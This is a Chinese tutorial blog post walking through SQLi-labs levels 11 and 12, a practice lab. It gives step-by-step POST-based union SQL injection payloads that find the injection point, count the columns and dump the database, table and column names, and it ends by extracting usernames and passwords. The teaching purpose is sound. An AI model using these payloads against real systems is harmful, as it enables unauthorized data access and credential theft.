SQLI-labs-第十一关和第十二关

目录

第十一关

1、判断注入点

2、判断字段值

3、爆库名

4、爆表名

5、爆字段名,以users表为例

6、爆值

第十二关

1、判断注入点

知识点:POST方式联合查询注入

第十一关

思路:

1、判断注入点

我们随便输入一个用户名和密码,使用Burpsuite抓包

抓到的包发送到repeater模块,查看正常回显是什么内容

这里有uname和passwd两个值,这两个都可能是注入点,我们都可以尝试一下

首先在uname的值加上单引号'

数据库语句报错,在passwd同理

说明这两个字段都存在注入点

判断注入点属于什么类型

输入uname=admin' and 1=1#

回显正常

输入uname=admin' and 1=2#

结果没有回显,说明这个注入点是单引号闭合错误的注入漏洞

2、判断字段值

使用order by 语句

uname=admin' order by 1#

从1开始尝试,试到3的时候报错,说明当前表的字段有2个

3、爆库名

做到这一步的时候,发现在uname这个点注入是没有回显信息的,只显示了正常的数据。需要在passwd这点注入才会回显,因为我们在最后加入了注释符#,会把passwd这个字段的值給注释掉,导致没有数据的正常回显。

使用联合查询语句 union

uname=admin&passwd=1' union select 1,database() #

4、爆表名

使用group_concat()函数

uname=admin&passwd=1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #

5、爆字段名,以users表为例

uname=admin&passwd=1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' #

6、爆值

使用concat_ws函数

uname=admin&passwd=1' union select 1,concat_ws(',',id,username,password) from security.users limit 0,1 #

通过修改limit 后面的值,就可以得到全部信息


第十二关

第十二关的思路跟第十一关的一样,只不过是双引号的闭合问题

1、判断注入点

接下来的步骤参考上面


这篇文章就写到这里,哪里有疑问或不足的欢迎指出!

相关推荐
光羽隹衡9 小时前
SQL中表删除与表修改
数据库·sql
l1t9 小时前
苏旭晖先生写的纯SQL求解Advent of Code 2025第9题 最大矩形面积 第2部分
数据库·sql·算法·计算几何·duckdb·advent of code
是垚不是土9 小时前
基于Blackbox Exporter的网络服务黑盒监控体系实践
网络·数据库·安全·http·微服务·prometheus
青w韵9 小时前
Claude 高级工具使用解析:从上下文优化到程序化调用的工程实践
数据库·windows
Hello.Reader10 小时前
Flink SQL DROP 语句安全删除 Catalog / Table / DB / View / Function / Model
数据库·sql·flink
luluoluoa10 小时前
科研业绩SCI、EI、会议、CSCD、CSSCI、中文核心、普刊介绍
数据库
liuzhilongDBA10 小时前
论文精读|DBAIOps
数据库·postgresql·dbaiops
木风小助理10 小时前
MySQL 存储过程与函数:核心辨析与应用指南
服务器·数据库·microsoft
普通网友10 小时前
更优雅的测试:Pytest框架入门
jvm·数据库·python